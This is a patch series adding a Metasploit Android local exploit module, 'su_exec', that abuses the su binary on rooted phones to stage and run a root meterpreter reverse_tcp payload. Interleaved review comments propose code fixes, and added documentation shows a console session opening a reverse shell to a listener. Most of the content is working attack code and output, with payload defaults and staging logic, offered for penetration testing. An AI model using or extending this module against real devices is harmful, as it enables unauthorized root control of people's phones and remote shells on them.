From 37530f037ed0c25bf719807c59e6e3427410f1b7 Mon Sep 17 00:00:00 2001
From: Tim
Date: Fri, 1 Sep 2017 10:57:48 +0800
Subject: [PATCH 1/5] su -> meterpreter as root
---
 modules/exploits/android/local/su_exec.rb | 60 +++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 modules/exploits/android/local/su_exec.rb
diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb
new file mode 100644
index 0000000000..db5dc6d6e7
--- /dev/null
+++ b/modules/exploits/android/local/su_exec.rb
@@ -0,0 +1,60 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => "Android 'su' Privilege Escalation",
+ 'Description' => %q{
+ This module uses the su binary present on rooted devices to run
+ a payload as root.
+ },
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Aug 31 2017',
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Platform' => [ 'android', 'linux' ],
+ 'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+ 'Targets' => [
+ ['armle', {'Arch' => ARCH_ARMLE}],
+ ['aarch64',{'Arch' => ARCH_AARCH64}],
+ ['x86', {'Arch' => ARCH_X86}],
+ ['x64', {'Arch' => ARCH_X64}],
+ ['mipsle', {'Arch' => ARCH_MIPSLE}]
+ ],
+ 'DefaultTarget' => 0,
+ }
+ ))
+ register_options([
+ OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
+ OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
+ ])
+ end
+
+ def exploit
+ arch = cmd_exec("getprop ro.product.cpu.abi")
+ print_status("Arch: #{arch}")
+
+ linemax = 4088 - datastore['SU_BINARY'].size
+ execute_cmdstager({
+ flavor: :echo,
+ enc_format: :octal,
+ prefix: '\\\\0',
+ temp: datastore['WritableDir'],
+ linemax: linemax,
+ background: true,
+ })
+ end
+
+ def execute_command(cmd, opts)
+ su_cmd = "#{datastore['SU_BINARY']} -c #{cmd}"
+ cmd_exec(su_cmd)
+ end
+
+end
+
From 19eb86790dca8551257c6e45960538b5162646de Mon Sep 17 00:00:00 2001
From: Tim W
Date: Sun, 6 May 2018 14:28:34 +0800
Subject: [PATCH 2/5] add android module to run payloads with su
---
 modules/exploits/android/local/su_exec.rb | 11 ++++-------
 1 file changed, 4 insertions(+), 7 deletions(-)
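Review bot: `exploit` fetches `ro.product.cpu.abi` and only prints it, so the selected target (defaulting to `armle`) is never checked against the device and a mismatched ELF is staged and silently fails to run, with the operator learning nothing until `WfsDelay` expires. The comparison is cheap and can key on the target names already declared in `'Targets'`: fail with `Failure::NoTarget` when no reported ABI matches. Android 5 and later expose `ro.product.cpu.abilist` with every ABI a multi-ABI device accepts, so a 64-bit handset that also runs `armeabi-v7a` is not wrongly rejected; older builds only have the single `ro.product.cpu.abi`, which is the fallback below. `execute_command` in this hunk is unaffected.
```ruby
  def exploit
    abis = cmd_exec('getprop ro.product.cpu.abilist').to_s.strip
    # Pre-Lollipop builds only expose the primary ABI
    abis = cmd_exec('getprop ro.product.cpu.abi').to_s.strip if abis.empty?
    print_status("Device ABIs: #{abis}")

    wanted = {
      'aarch64' => /\Aarm64/, 'armle' => /\Aarmeabi/, 'x86' => /\Ax86\z/,
      'x64' => /\Ax86_64\z/, 'mipsle' => /\Amips\z/
    }[target.name]
    unless abis.split(',').any? { |abi| abi =~ wanted }
      fail_with(Failure::NoTarget, "Device ABIs '#{abis}' do not include target #{target.name}")
    end
    # … unchanged: linemax and execute_cmdstager call …
  end
```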
diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb
index db5dc6d6e7..e6128b5b97 100644
--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -17,12 +17,12 @@ class MetasploitModule < Msf::Exploit::Local
 },
 'License' => MSF_LICENSE,
 'DisclosureDate' => 'Aug 31 2017',
- 'SessionTypes' => [ 'meterpreter' ],
+ 'SessionTypes' => [ 'meterpreter', 'shell' ],
 'Platform' => [ 'android', 'linux' ],
- 'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+ 'Arch' => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
 'Targets' => [
- ['armle', {'Arch' => ARCH_ARMLE}],
 ['aarch64',{'Arch' => ARCH_AARCH64}],
+ ['armle', {'Arch' => ARCH_ARMLE}],
 ['x86', {'Arch' => ARCH_X86}],
 ['x64', {'Arch' => ARCH_X64}],
 ['mipsle', {'Arch' => ARCH_MIPSLE}]
@@ -37,9 +37,6 @@ class MetasploitModule < Msf::Exploit::Local
 end

 def exploit
- arch = cmd_exec("getprop ro.product.cpu.abi")
- print_status("Arch: #{arch}")
-
 linemax = 4088 - datastore['SU_BINARY'].size
 execute_cmdstager({
 flavor: :echo,
@@ -52,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
 end

 def execute_command(cmd, opts)
- su_cmd = "#{datastore['SU_BINARY']} -c #{cmd}"
+ su_cmd = "#{datastore['SU_BINARY']} -c '#{cmd}'"
 cmd_exec(su_cmd)
 end

From 67fc37c36976606e8f6aaf20776f256555a9c856 Mon Sep 17 00:00:00 2001
From: Tim W
Date: Mon, 7 May 2018 18:29:54 +0800
Subject: [PATCH 3/5] improve description
---
 modules/exploits/android/local/su_exec.rb | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb
index e6128b5b97..836ff37ebf 100644
--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -4,7 +4,7 @@
 ##

 class MetasploitModule < Msf::Exploit::Local
- Rank = ExcellentRanking
+ Rank = ManualRanking

 include Msf::Exploit::CmdStager
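Review bot: The single quotes now wrapped around `#{cmd}` in `execute_command` assume the staged command contains none, and nothing enforces that: `WritableDir` is operator-typed and the stager embeds it in every echo/chmod/exec line, so a `'` in it ends the quoted command early, and an unbalanced `'` in `SU_BINARY` breaks the line the same way. A one-line guard at the top of `exploit` closes that: `fail_with(Failure::BadConfig, 'SU_BINARY and WritableDir must not contain a single quote') if [datastore['SU_BINARY'], datastore['WritableDir']].any? { |v| v.to_s.include?("'") }`. Whether the echo-flavor stager itself can ever emit a quote depends on CmdStager internals not visible here; if it can, the wrapper needs `'\''` escaping of `cmd` rather than a guard on the options.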
@@ -14,6 +14,16 @@ class MetasploitModule < Msf::Exploit::Local
 'Description' => %q{
 This module uses the su binary present on rooted devices to run
 a payload as root.
+
+ A root Android device will contain a su binary (often linked with
+ an application) that allows the user to run commands as root.
+ This module will use the su binary to execute a command stager
+ as root. The command stager will write a payload binary to a
+ temporary directory, make it executable, execute it in the background,
+ and finally delete the executable.
+
+ On most devices the su binary will pop-up a prompt on the device
+ asking the user for permission.
 },
 'License' => MSF_LICENSE,
 'DisclosureDate' => 'Aug 31 2017',
From 629c5a82f19570d2bd97f9e8c7ac0c3c1ed3e34e Mon Sep 17 00:00:00 2001
From: Tim W
Date: Thu, 17 May 2018 20:48:25 +0800
Subject: [PATCH 4/5] default to aarch64
---
 modules/exploits/android/local/su_exec.rb | 25 ++++++++++++++++++-----
 1 file changed, 20 insertions(+), 5 deletions(-)
diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb
index 836ff37ebf..34a4c1f38f 100644
--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -7,6 +7,8 @@ class MetasploitModule < Msf::Exploit::Local
 Rank = ManualRanking

 include Msf::Exploit::CmdStager
+ include Msf::Post::File
+ include Msf::Post::Android::Priv

 def initialize(info={})
 super( update_info( info, {
@@ -15,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
 This module uses the su binary present on rooted devices to run
 a payload as root.

- A root Android device will contain a su binary (often linked with
+ A rooted Android device will contain a su binary (often linked with
 an application) that allows the user to run commands as root.
 This module will use the su binary to execute a command stager
 as root. The command stager will write a payload binary to a
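Review bot: The description added here says the su binary is "often linked with an application" without telling the operator what that implies: the grant decision belongs to a separate superuser-management app whose prompt blocks each `su -c` call in `execute_command` (outside this hunk) until someone taps Allow on the handset, so a run cannot be fully unattended, and a denied prompt produces no session and no error from the module itself. Suggest `A rooted Android device ships a su binary, typically paired with a superuser-management app that mediates each grant request.` for the first sentence and `On most devices that app pops up an on-screen prompt the device's user must accept before the command runs; this module makes no attempt to pre-approve or bypass it.` for the last paragraph, which also fixes `pop-up` (a noun) where the verb `pop up` is meant. The switch to `ManualRanking` in this commit's first hunk is consistent with that caveat and worth stating in the description.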
@@ -29,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Local
 'DisclosureDate' => 'Aug 31 2017',
 'SessionTypes' => [ 'meterpreter', 'shell' ],
 'Platform' => [ 'android', 'linux' ],
- 'Arch' => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+ 'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
 'Targets' => [
 ['aarch64',{'Arch' => ARCH_AARCH64}],
 ['armle', {'Arch' => ARCH_ARMLE}],
@@ -37,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Local
 ['x64', {'Arch' => ARCH_X64}],
 ['mipsle', {'Arch' => ARCH_MIPSLE}]
 ],
+ 'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' },
 'DefaultTarget' => 0,
 }
 ))
@@ -46,20 +49,32 @@ class MetasploitModule < Msf::Exploit::Local
 ])
 end

+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def su_bin
+ datastore['SU_BINARY'].to_s
+ end
+
 def exploit
- linemax = 4088 - datastore['SU_BINARY'].size
+ if is_root?
+ fail_with Failure::BadConfig, 'Session already has root privileges'
+ end
+
+ linemax = 4088 - su_bin.size
 execute_cmdstager({
 flavor: :echo,
 enc_format: :octal,
 prefix: '\\\\0',
- temp: datastore['WritableDir'],
+ temp: base_dir,
 linemax: linemax,
 background: true,
 })
 end

 def execute_command(cmd, opts)
- su_cmd = "#{datastore['SU_BINARY']} -c '#{cmd}'"
+ su_cmd = "#{su_bin} -c '#{cmd}'"
 cmd_exec(su_cmd)
 end

From dea3f90e0b64d8246583306234c492664836c3d2 Mon Sep 17 00:00:00 2001
From: Tim W
Date: Mon, 1 Oct 2018 17:50:33 +0800
Subject: [PATCH 5/5] add documentation with the current status
---
 .../modules/exploit/android/local/su_exec.md | 57 +++++++++++++++++++
 modules/exploits/android/local/su_exec.rb | 5 +-
 2 files changed, 61 insertions(+), 1 deletion(-)
 create mode 100644 documentation/modules/exploit/android/local/su_exec.md
diff --git a/documentation/modules/exploit/android/local/su_exec.md b/documentation/modules/exploit/android/local/su_exec.md
new file mode 100644
index 0000000000..5ebba74610
--- /dev/null
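Review bot: `linemax = 4088 - su_bin.size` in the rewritten `exploit` budgets only for the binary name, but `execute_command` in the same hunk wraps every stager line as `#{su_bin} -c '#{cmd}'`, so the six bytes of ` -c ''` are unaccounted for and each line sent is that much longer than whatever limit 4088 was derived from (the derivation is not visible here). Computing it from the wrapper, `linemax = 4088 - "#{su_bin} -c ''".size`, keeps the two in step if the wrapper changes. Separately, the new `is_root?` guard rejects sessions that already have root, but nothing confirms `su` is reachable before the stager starts; with `Msf::Post::File` now included, a `check` method can answer that without raising a prompt on the handset, assuming `command_exists?` behaves on the Android shell as it does on Linux.
```ruby
  # … unchanged: base_dir / su_bin helpers …

  def check
    # Only tests that the binary is on the session's PATH; whether the
    # superuser app will grant root is not knowable until the prompt is answered.
    return CheckCode::Safe unless command_exists?(su_bin)
    CheckCode::Detected
  end

  def exploit
    # … unchanged: is_root? guard …
    linemax = 4088 - "#{su_bin} -c ''".size
    # … unchanged: execute_cmdstager call …
  end
```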
+++ b/documentation/modules/exploit/android/local/su_exec.md 
@@ -0,0 +1,57 @@
+## Description
+
+This module uses the su binary present on rooted devices to run a payload as root.
+
+A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
+This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
+temporary directory, make it executable, execute it in the background, and finally delete the executable.
+
+On most devices the su binary will pop-up a prompt on the device asking the user for permission.
+
+## Vulnerable Application
+
+This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
+Many devices can be rooted by flashing new firmware, however the existing data will be lost.
+
+## Verfication steps
+
+You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)
+
+Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler.
+An example session follows:
+
+```
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+ Id Name Type Information Connection
+ -- ---- ---- ----------- ----------
+ 1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)
+
+msf5 exploit(multi/handler) > use exploit/android/local/su_exec
+msf5 exploit(android/local/su_exec) > set SESSION 1
+SESSION => 1
+msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
+payload => linux/aarch64/meterpreter/reverse_tcp
+msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
+LHOST => 192.168.0.176
+msf5 exploit(android/local/su_exec) > set LPORT 4445
+LPORT => 4445
+msf5 exploit(android/local/su_exec) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.0.176:4445
+[*] Transmitting intermediate midstager...(256 bytes)
+[*] Sending stage (818780 bytes) to 192.168.0.107
+[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
+[-] Exploit failed: Rex::TimeoutError Operation timed out.
+[*] Exploit completed, but no session was created.
+
+```
+
+Please not that in most cases you will have to manually confirm the Superuser prompt
+on the device itself before the module completes. You can do `set WfsDelay 10` to
+give yourself more time.
+
diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb
index 34a4c1f38f..a69c3a3503 100644
--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -39,7 +39,10 @@ class MetasploitModule < Msf::Exploit::Local
 ['x64', {'Arch' => ARCH_X64}],
 ['mipsle', {'Arch' => ARCH_MIPSLE}]
 ],
- 'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' },
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
+ 'WfsDelay' => 5,
+ },
 'DefaultTarget' => 0,
 }
 ))
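Review bot: The `WfsDelay` default added here only lengthens the wait for the new session after the stager has finished; it does nothing for the `Rex::TimeoutError` shown in the accompanying documentation, which is raised by `cmd_exec` in `execute_command` (outside this hunk) while a line is still blocked on the Superuser prompt or, as the sample run suggests, on the output of the backgrounded payload. `cmd_exec` takes its own per-command timeout as its third argument, so that is the value to expose: `OptInt.new('SU_TIMEOUT', [true, 'Seconds to wait for each su command, including the on-device prompt', 60])` in `register_options` and `cmd_exec(su_cmd, nil, datastore['SU_TIMEOUT'])` in `execute_command`. The sample run is worth re-recording once that is fixed, since as printed it reports session 2 opened and then that no session was created. The new markdown also has two typos to fix in the same commit: `Verfication` and `Please not that`.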